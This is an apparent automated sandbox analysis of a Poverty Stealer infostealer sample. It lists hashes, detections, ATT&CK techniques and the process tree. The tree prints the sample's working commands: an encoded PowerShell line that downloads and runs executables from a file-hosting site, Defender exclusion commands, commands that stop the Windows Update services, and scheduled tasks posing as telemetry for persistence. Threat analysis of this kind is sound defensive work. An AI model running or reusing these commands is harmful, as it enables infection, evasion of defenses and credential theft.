povertystealer | 1f4c7a9b466d8948c8b7331d7be380640afb67f2893789294c9fdd4f07b465df

Analysis

max time kernel
127s
max time network
81s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
20/09/2023, 10:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4PROSetup.exe
Size

310KB
MD5

8aedbe2e0aa36d89f5e6ca350297c608
SHA1

6ce038ac4bed79594807f9a20d13f99653db921d
SHA256

1f4c7a9b466d8948c8b7331d7be380640afb67f2893789294c9fdd4f07b465df
SHA512

b6478c929b41a22bad5188bd343300dc798ceb131fc4d86f10c2ee57269973fe4fad1fea4a7bf512047d50fada54c341f07fd96b1a67e67cd4a703678a5dbea0
SSDEEP

6144:CdMLKclkxl14NRjDS35D3MUVJEMvfjeS8X9X20:lGciJ0RC393LVJbvLkk0

Score

10^/10

povertystealer evasion spyware stealer

Malware Config

Signatures

Detect Poverty Stealer Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000900000001affe-529.dat	family_povertystealer
behavioral1/files/0x000900000001affe-532.dat	family_povertystealer

Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 5032 created 3280	5032	Updaters.exe	57
PID 5032 created 3280	5032	Updaters.exe	57
PID 5032 created 3280	5032	Updaters.exe	57
PID 5032 created 3280	5032	Updaters.exe	57

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	Updaters.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 12 IoCs

pid	Process
3664	Newloads.exe
4140	C4.exe
5032	Updaters.exe
1068	Lbovws.exe
4348	Lbovws.exe
324	C4.exe
1688	C4.exe
1572	C4.exe
1732	fodhelper.exe
4228	fodhelper.exe
3308	fodhelper.exe
2672	fodhelper.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2076 set thread context of 4128	2076	C4PROSetup.exe	73
PID 1068 set thread context of 4348	1068	Lbovws.exe	83
PID 4140 set thread context of 1572	4140	C4.exe	100
PID 1732 set thread context of 4228	1732	fodhelper.exe	102
PID 3308 set thread context of 2672	3308	fodhelper.exe	106

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsDefenderup\Defender\SmartScreensup.exe	Updaters.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5024	sc.exe
3816	sc.exe
2276	sc.exe
4948	sc.exe
5060	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1556	schtasks.exe
1912	schtasks.exe
2236	schtasks.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2076	C4PROSetup.exe
1668	powershell.exe
3816	powershell.exe
1668	powershell.exe
3816	powershell.exe
1668	powershell.exe
3816	powershell.exe
1068	Lbovws.exe
5032	Updaters.exe
5032	Updaters.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe
5032	Updaters.exe
5032	Updaters.exe
5032	Updaters.exe
5032	Updaters.exe
5032	Updaters.exe
5032	Updaters.exe
4140	C4.exe
4140	C4.exe
4140	C4.exe
4140	C4.exe
1732	fodhelper.exe
1572	C4.exe
3308	fodhelper.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

description	pid	Process
Token: SeDebugPrivilege	2076	C4PROSetup.exe
Token: SeDebugPrivilege	1668	powershell.exe
Token: SeDebugPrivilege	3816	powershell.exe
Token: SeDebugPrivilege	4140	C4.exe
Token: SeDebugPrivilege	1068	Lbovws.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeIncreaseQuotaPrivilege	4964	powershell.exe
Token: SeSecurityPrivilege	4964	powershell.exe
Token: SeTakeOwnershipPrivilege	4964	powershell.exe
Token: SeLoadDriverPrivilege	4964	powershell.exe
Token: SeSystemProfilePrivilege	4964	powershell.exe
Token: SeSystemtimePrivilege	4964	powershell.exe
Token: SeProfSingleProcessPrivilege	4964	powershell.exe
Token: SeIncBasePriorityPrivilege	4964	powershell.exe
Token: SeCreatePagefilePrivilege	4964	powershell.exe
Token: SeBackupPrivilege	4964	powershell.exe
Token: SeRestorePrivilege	4964	powershell.exe
Token: SeShutdownPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeSystemEnvironmentPrivilege	4964	powershell.exe
Token: SeRemoteShutdownPrivilege	4964	powershell.exe
Token: SeUndockPrivilege	4964	powershell.exe
Token: SeManageVolumePrivilege	4964	powershell.exe
Token: 33	4964	powershell.exe
Token: 34	4964	powershell.exe
Token: 35	4964	powershell.exe
Token: 36	4964	powershell.exe
Token: SeDebugPrivilege	1732	fodhelper.exe
Token: SeDebugPrivilege	1572	C4.exe
Token: SeDebugPrivilege	3308	fodhelper.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2076 wrote to memory of 4444	2076	C4PROSetup.exe	71
PID 2076 wrote to memory of 4444	2076	C4PROSetup.exe	71
PID 2076 wrote to memory of 4444	2076	C4PROSetup.exe	71
PID 2076 wrote to memory of 4128	2076	C4PROSetup.exe	73
PID 2076 wrote to memory of 4128	2076	C4PROSetup.exe	73
PID 2076 wrote to memory of 4128	2076	C4PROSetup.exe	73
PID 2076 wrote to memory of 4128	2076	C4PROSetup.exe	73
PID 2076 wrote to memory of 4128	2076	C4PROSetup.exe	73
PID 2076 wrote to memory of 4128	2076	C4PROSetup.exe	73
PID 2076 wrote to memory of 4128	2076	C4PROSetup.exe	73
PID 2076 wrote to memory of 4128	2076	C4PROSetup.exe	73
PID 4444 wrote to memory of 1668	4444	cmd.exe	74
PID 4444 wrote to memory of 1668	4444	cmd.exe	74
PID 4444 wrote to memory of 1668	4444	cmd.exe	74
PID 4128 wrote to memory of 3816	4128	AppLaunch.exe	76
PID 4128 wrote to memory of 3816	4128	AppLaunch.exe	76
PID 4128 wrote to memory of 3816	4128	AppLaunch.exe	76
PID 3816 wrote to memory of 3664	3816	sc.exe	77
PID 3816 wrote to memory of 3664	3816	sc.exe	77
PID 3816 wrote to memory of 3664	3816	sc.exe	77
PID 3816 wrote to memory of 4140	3816	sc.exe	78
PID 3816 wrote to memory of 4140	3816	sc.exe	78
PID 3816 wrote to memory of 4140	3816	sc.exe	78
PID 3816 wrote to memory of 5032	3816	sc.exe	79
PID 3816 wrote to memory of 5032	3816	sc.exe	79
PID 3816 wrote to memory of 1068	3816	sc.exe	80
PID 3816 wrote to memory of 1068	3816	sc.exe	80
PID 3816 wrote to memory of 1068	3816	sc.exe	80
PID 1068 wrote to memory of 4348	1068	Lbovws.exe	83
PID 1068 wrote to memory of 4348	1068	Lbovws.exe	83
PID 1068 wrote to memory of 4348	1068	Lbovws.exe	83
PID 1068 wrote to memory of 4348	1068	Lbovws.exe	83
PID 1068 wrote to memory of 4348	1068	Lbovws.exe	83
PID 1068 wrote to memory of 4348	1068	Lbovws.exe	83
PID 1068 wrote to memory of 4348	1068	Lbovws.exe	83
PID 1068 wrote to memory of 4348	1068	Lbovws.exe	83
PID 4348 wrote to memory of 1556	4348	Lbovws.exe	84
PID 4348 wrote to memory of 1556	4348	Lbovws.exe	84
PID 4348 wrote to memory of 1556	4348	Lbovws.exe	84
PID 4720 wrote to memory of 5024	4720	cmd.exe	89
PID 4720 wrote to memory of 5024	4720	cmd.exe	89
PID 4720 wrote to memory of 3816	4720	cmd.exe	90
PID 4720 wrote to memory of 3816	4720	cmd.exe	90
PID 4720 wrote to memory of 2276	4720	cmd.exe	91
PID 4720 wrote to memory of 2276	4720	cmd.exe	91
PID 4720 wrote to memory of 4948	4720	cmd.exe	92
PID 4720 wrote to memory of 4948	4720	cmd.exe	92
PID 4720 wrote to memory of 5060	4720	cmd.exe	93
PID 4720 wrote to memory of 5060	4720	cmd.exe	93
PID 4140 wrote to memory of 324	4140	C4.exe	98
PID 4140 wrote to memory of 324	4140	C4.exe	98
PID 4140 wrote to memory of 324	4140	C4.exe	98
PID 4140 wrote to memory of 1688	4140	C4.exe	99
PID 4140 wrote to memory of 1688	4140	C4.exe	99
PID 4140 wrote to memory of 1688	4140	C4.exe	99
PID 4140 wrote to memory of 1572	4140	C4.exe	100
PID 4140 wrote to memory of 1572	4140	C4.exe	100
PID 4140 wrote to memory of 1572	4140	C4.exe	100
PID 4140 wrote to memory of 1572	4140	C4.exe	100
PID 4140 wrote to memory of 1572	4140	C4.exe	100
PID 4140 wrote to memory of 1572	4140	C4.exe	100
PID 4140 wrote to memory of 1572	4140	C4.exe	100
PID 4140 wrote to memory of 1572	4140	C4.exe	100
PID 1732 wrote to memory of 4228	1732	fodhelper.exe	102

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3280
- C:\Users\Admin\AppData\Local\Temp\C4PROSetup.exe
  "C:\Users\Admin\AppData\Local\Temp\C4PROSetup.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4444
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell set-mppreference -exclusionpath C:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1668
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4128
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAbgBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegB0AGwAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB4AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBrAG0AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQA3AC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvADkAMwBlAGQANwAwADkANgAtADUAOQA0ADUALQA0ADQAMQA3AC0AYQA2ADQAMQAtADkAZgAxAGQANABlADMANQA0ADMANAA3AC8ATgBlAHcAbABvAGEAZABzAC4AZQB4AGUAJwAsACAAPAAjAGUAeQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegB6AGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgBlAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATgBlAHcAbABvAGEAZABzAC4AZQB4AGUAJwApACkAPAAjAG4AYgBnACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQA3AC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvADkAMwAwADMAOQBiAGYAMQAtADkAYQAxADgALQA0AGMAMwBjAC0AYgAxADEANgAtADIAZgA1ADMAMgA5AGEAOQBmAGQAMwA3AC8AQwA0AC4AZQB4AGUAJwAsACAAPAAjAGUAagBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwB3AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBjAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AC4AZQB4AGUAJwApACkAPAAjAHMAbQBhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQA3AC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvAGIAZgBhAGYAMwA4AGQAZAAtAGYANQBjAGEALQA0ADMAYQBkAC0AYQA5ADAANAAtADgAYwAwADEANAA4AGEANgAyADMAMwBlAC8AVQBwAGQAYQB0AGUAcgBzAC4AZQB4AGUAJwAsACAAPAAjAG0AZQBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB3AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYQBtAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUAcgBzAC4AZQB4AGUAJwApACkAPAAjAGUAdQBhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQA3AC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvAGUAMABhADUAZAAxADQANwAtADMAYwAxADAALQA0ADQAOAAzAC0AYgBhAGEAYwAtADIAZABhADUAMgAzADAAYwBiADQAZQA2AC8ATABiAG8AdgB3AHMALgBlAHgAZQAnACwAIAA8ACMAcQB3AHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBnAGwAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBxAHQAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGIAbwB2AHcAcwAuAGUAeABlACcAKQApADwAIwBzAHAAcgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAGwAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZABoAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATgBlAHcAbABvAGEAZABzAC4AZQB4AGUAJwApADwAIwBxAGoAcgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGwAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawB2AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AC4AZQB4AGUAJwApADwAIwBiAHQAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB6AGEAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQB0AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUAcgBzAC4AZQB4AGUAJwApADwAIwBxAGYAYgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBpAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABiAG8AdgB3AHMALgBlAHgAZQAnACkAPAAjAGgAdwBxACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3816
    - - C:\Users\Admin\AppData\Local\Temp\Newloads.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Newloads.exe"
        5⤵
        Executes dropped EXE
        
        PID:3664
    - - C:\Users\Admin\AppData\Local\Temp\C4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C4.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4140
      - C:\Users\Admin\AppData\Local\Temp\C4.exe
        
        C:\Users\Admin\AppData\Local\Temp\C4.exe
        6⤵
        Executes dropped EXE
        
        PID:324
      - C:\Users\Admin\AppData\Local\Temp\C4.exe
        
        C:\Users\Admin\AppData\Local\Temp\C4.exe
        6⤵
        Executes dropped EXE
        
        PID:1688
      - C:\Users\Admin\AppData\Local\Temp\C4.exe
        
        C:\Users\Admin\AppData\Local\Temp\C4.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1572
    - - C:\Users\Admin\AppData\Local\Temp\Updaters.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Updaters.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:5032
    - - C:\Users\Admin\AppData\Local\Temp\Lbovws.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Lbovws.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1068
      - C:\Users\Admin\AppData\Local\Temp\Lbovws.exe
        
        C:\Users\Admin\AppData\Local\Temp\Lbovws.exe
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4348
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:1556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4964
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4720
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5024
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    - Suspicious use of WriteProcessMemory
    PID:3816
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2276
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4948
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5060
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "WindowsDefenderSmartScreenUpdater"
  2⤵
  PID:3752
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "WindowsDefenderSmartScreenUpdater" /xml "C:\Users\Admin\AppData\Local\Temp\jfctdwzpngfz.xml"
  2⤵
  - Creates scheduled task(s)
  PID:1912

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  2⤵
  - Executes dropped EXE
  PID:4228
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
    3⤵
    - Creates scheduled task(s)
    PID:2236

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308
- C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  2⤵
  - Executes dropped EXE
  PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C4.exe.log

Filesize
1KB

MD5
10814e9374c4674fa92e55118c282ea7

SHA1
6967ab9bce1bd24f7c8d3a6877a3d2650ce481e0

SHA256
fbf67d3906865b5a897d028f490c0cc55370ff9ac40fcc41ae70f36221a80462

SHA512
9b143a57d9e1c724686ee934476cfb66dea64c2e30f213503398f26fe53096ee397e70c53d960400d6e4c11733c79360cee8a286fcae2ca389c70bb83dce8e1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fodhelper.exe.log

Filesize
927B

MD5
ffe7bf10728fcdc9cfc28d6c2320a6f8

SHA1
af407275e9830d40889da2e672d2e6af118c8cb8

SHA256
72653cc5191f40cf26bcabcb5e0e41e53f23463f725007f74da78e36f9ec1522

SHA512
766753516d36ef1065d29dd982e0b6ee4e84c0c17eb2b0a6ca056f6c8e2a908e53c169bbcb01ab8b9ba1be1463fdd4007398d964aed59de761c1a6213842776c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
9b17ac4e26d97ef2521116bab34d6e6a

SHA1
ba8a93e611bf924a7184e85cc8b8b244dd4e40b9

SHA256
bc4109b58d95a2c8f546055e95d05277d8c36af8c8901cfcee9af1e0e9dde67c

SHA512
47855cc8b8211962d6497143582b66eab178df2985e790cdcb1774d03b228d476aa1cbc5d3e512116c02c7796eb6cf5193cc0e5bda85dbcd546f5ae5505fbb4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
9b17ac4e26d97ef2521116bab34d6e6a

SHA1
ba8a93e611bf924a7184e85cc8b8b244dd4e40b9

SHA256
bc4109b58d95a2c8f546055e95d05277d8c36af8c8901cfcee9af1e0e9dde67c

SHA512
47855cc8b8211962d6497143582b66eab178df2985e790cdcb1774d03b228d476aa1cbc5d3e512116c02c7796eb6cf5193cc0e5bda85dbcd546f5ae5505fbb4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4.exe

Filesize
2.1MB

MD5
e0c4a0cb01198a74e621bd1ac90ffd0d

SHA1
ff55042be936d249b62e4ceee5c12b6f543b738a

SHA256
2f06a6cecf3a9e94ffb771a3516193d7cde82d46953b773d016ea478092ad145

SHA512
85ceae8f3795e718842ec2934214058a97341998241f30b6f3a3d9c8660afb3cc953cccbe41a8ffa75feba2a0f4e29cdffbb4ec596e3bd061b5d6049dc63568e

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4.exe

Filesize
2.1MB

MD5
e0c4a0cb01198a74e621bd1ac90ffd0d

SHA1
ff55042be936d249b62e4ceee5c12b6f543b738a

SHA256
2f06a6cecf3a9e94ffb771a3516193d7cde82d46953b773d016ea478092ad145

SHA512
85ceae8f3795e718842ec2934214058a97341998241f30b6f3a3d9c8660afb3cc953cccbe41a8ffa75feba2a0f4e29cdffbb4ec596e3bd061b5d6049dc63568e

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4.exe

Filesize
2.1MB

MD5
e0c4a0cb01198a74e621bd1ac90ffd0d

SHA1
ff55042be936d249b62e4ceee5c12b6f543b738a

SHA256
2f06a6cecf3a9e94ffb771a3516193d7cde82d46953b773d016ea478092ad145

SHA512
85ceae8f3795e718842ec2934214058a97341998241f30b6f3a3d9c8660afb3cc953cccbe41a8ffa75feba2a0f4e29cdffbb4ec596e3bd061b5d6049dc63568e

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4.exe

Filesize
2.1MB

MD5
e0c4a0cb01198a74e621bd1ac90ffd0d

SHA1
ff55042be936d249b62e4ceee5c12b6f543b738a

SHA256
2f06a6cecf3a9e94ffb771a3516193d7cde82d46953b773d016ea478092ad145

SHA512
85ceae8f3795e718842ec2934214058a97341998241f30b6f3a3d9c8660afb3cc953cccbe41a8ffa75feba2a0f4e29cdffbb4ec596e3bd061b5d6049dc63568e

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4.exe

Filesize
2.1MB

MD5
e0c4a0cb01198a74e621bd1ac90ffd0d

SHA1
ff55042be936d249b62e4ceee5c12b6f543b738a

SHA256
2f06a6cecf3a9e94ffb771a3516193d7cde82d46953b773d016ea478092ad145

SHA512
85ceae8f3795e718842ec2934214058a97341998241f30b6f3a3d9c8660afb3cc953cccbe41a8ffa75feba2a0f4e29cdffbb4ec596e3bd061b5d6049dc63568e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lbovws.exe

Filesize
273KB

MD5
919cad063b906ff8275fdead62dcebed

SHA1
fce64e935a5254bf521b37c8cf7290b4f3fd9437

SHA256
ab593023cca777fb1e5baab0c43a3f97c6f7bd949060508428d4deee2079a2de

SHA512
02592bcfbd10785789582618c270f305bb96be79ee315bddcb3dee241861b425862be03eeeb1ae96446669fa7912e31477e01aefed9ae4eb5a8cac2dd9412715

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lbovws.exe

Filesize
273KB

MD5
919cad063b906ff8275fdead62dcebed

SHA1
fce64e935a5254bf521b37c8cf7290b4f3fd9437

SHA256
ab593023cca777fb1e5baab0c43a3f97c6f7bd949060508428d4deee2079a2de

SHA512
